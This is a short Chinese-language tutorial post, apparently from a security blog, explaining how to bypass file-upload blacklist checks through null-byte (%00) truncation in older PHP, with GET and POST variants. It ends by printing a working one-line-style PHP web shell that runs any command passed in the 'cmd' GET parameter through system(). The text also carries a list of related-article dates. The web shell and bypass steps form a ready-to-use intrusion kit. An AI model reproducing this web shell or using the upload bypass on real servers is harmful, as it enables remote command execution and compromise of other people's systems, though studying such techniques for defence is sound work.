绕过黑名单验证(00截断绕过)
00截断原理
0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。
系统在对文件名的读取时,如果遇到0x00,就会认为读取已结束。
在PHP5.3之后的版本中完全修复了00截断。并且00截断受限于GPC,addslashes函数。
GET型00截断
GET型提交的内容会被自动进行URL解码。
注意:一定要关闭GPC,否则无法成功。


POST型00截断
在POST请求中,%00不会被自动解码,需要在16进制中进行修改00

一句话代码执行webshell
使用php中的函数system执行GET提交的参数。

<?php
if($_GET){
$cmd = $_GET["cmd"];
system($cmd);
}else{
echo "no cmd";
}
?>
1
2
3
4
5
6
7
8

--------------------

相关文章:

  • 2021-05-03
  • 2022-01-18
  • 2022-12-23
  • 2021-12-09
  • 2022-12-23
  • 2021-07-16
  • 2022-12-23
  • 2021-12-21
猜你喜欢
  • 2021-09-08
  • 2021-08-07
  • 2021-04-13
  • 2021-09-12
  • 2022-12-23
  • 2021-10-09
  • 2021-06-10
相关资源
相似解决方案